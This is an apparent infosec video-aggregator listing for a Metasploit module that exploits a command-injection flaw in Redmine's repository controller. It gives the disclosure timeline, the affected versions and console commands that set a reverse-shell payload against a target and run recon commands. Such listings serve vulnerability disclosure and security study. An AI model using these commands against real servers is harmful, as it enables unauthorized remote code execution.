Description: Timeline :
Vulnerability submitted by joernchen to Redmine the 2010-12-18
Vulnerability advisory and new package provided by Redmine the 2010-12-23
Metasploit exploit released the 2010-12-24
Provided by:
joernchen
References :
OSVDB-70090
Affected versions :
All versions of Redmine previous version 1.0.5, version 0.9.x included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid
Tested on Ubuntu Lucid 10.04.1 LTS with :
CVS as SCM
Description:
This module exploits an arbitrary command execution vulnerability in the Redmine repository controller. The flaw is triggered when a rev parameter is passed to the command line of the SCM tool without adequate filtering.
Not all SCM are affected, only bazaar, cvs, darcs and mercurial. After exploitation you will get a remote shell with the privileges of the user running Redmine (for example apache).
Metasploit demo :
use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit
id
uname -a
/sbin/ifconfig
Tags: redmine , exploit , metasploit , rce , unix , linux ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.